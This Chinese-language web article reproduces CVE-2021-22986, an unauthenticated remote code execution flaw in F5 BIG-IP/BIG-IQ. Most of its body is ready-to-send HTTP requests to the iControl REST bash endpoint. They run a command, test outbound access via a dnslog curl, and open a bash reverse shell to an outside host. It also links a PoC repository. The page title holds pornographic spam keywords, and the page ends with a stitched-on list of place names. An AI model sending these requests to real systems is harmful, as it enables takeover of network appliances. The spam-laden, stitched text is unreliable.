亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

發布時間:2021-12-29 17:40:38 來源:億速云 閱讀:298 作者:柒染 欄目:安全技術

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

0x00漏洞簡述

F5 BIG-IP 是美國 F5 公司的一款集成了網絡流量管理、應用程序安全管理、負載均衡等功能的應用交付平臺。

2021 年3月10日,F5官方發布安全通告,安全更新包含了影響F5的BIG-IP,BIG-IQ設備的多個高危漏洞,漏洞編號分別為CVE-2021-22986,CVE-2021-22987,CVE-2021-22988,CVE-2021-22989,CVE-2021-22990,CVE-2021-22991,CVE-2021-22992;其中CVE-2021-22986為F5 BIG-IP/IQ設備 iControl REST接口的未授權遠程代碼執行漏洞,漏洞評分9.8,評級嚴重。F5安全公告更新了BIG-IP,BIG-IQ中的多個嚴重漏洞。建議廣大用戶及時將f5 big-iq,f5 big-ip升級到最新版本,避免遭到攻擊。

0x01影響版本

BIG-IP 16.0.0-16.0.1
BIG-IP 15.1.0-15.1.2
BIG-IP 14.1.0-14.1.3.1
BIG-IP 13.1.0-13.1.3.5
BIG-IP 12.1.0-12.1.5.2
BIG-IQ 7.1.0-7.1.0.2
BIG-IQ 7.0.0-7.0.0.1
BIG-IQ 6.0.0-6.1.0

0x02漏洞復現

部署安裝F5 BIG-IPV漏洞測試靶場環境。

1、訪問漏洞環境

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

2、POC驗證,進行命令執行操作

1.系統命令執行

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 41

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c id"}

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

2.通過dnslog探測是否可以出網

生成域名:zg8ie5.dnslog.cn

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

出網探測

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 62

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c 'curl zg8ie5.dnslog.cn'"}

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

發現可以出網

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

3.通過bash反彈shell到vps

POST /mgmt/tm/util/bash HTTP/1.1

Host: 192.168.3.112

Connection: close

Content-Length: 83

Cache-Control: max-age=0

Authorization: Basic YWRtaW46QVNhc1M=

X-F5-Auth-Token:

Upgrade-Insecure-Requests: 1

Content-Type: application/json

{"command":"run","utilCmdArgs":"-c 'bash -i >&/dev/tcp/6.6.6.6/12377 0>&1'"}

F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的

漏洞驗證python腳本

https://github.com/PeiQi0/PeiQi-WIKI-POC

0x03修復建議

升級到最新版本

關于F5 BIG-IP遠程代碼執行漏洞CVE-2021-22986的分析是怎樣的問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

鄂州市| 滨州市| 碌曲县| 乌鲁木齐市| 来安县| 稷山县| 宜城市| 高台县| 乐亭县| 平湖市| 亚东县| 瓦房店市| 潮安县| 于田县| 昌黎县| 抚松县| 浏阳市| 桃源县| 河源市| 宣恩县| 资兴市| 汶上县| 和顺县| 廊坊市| 大荔县| 西畴县| 广丰县| 定襄县| 山丹县| 安徽省| 临漳县| 渝北区| 化德县| 梓潼县| 岢岚县| 柞水县| 霸州市| 聊城市| 凯里市| 大港区| 丰城市|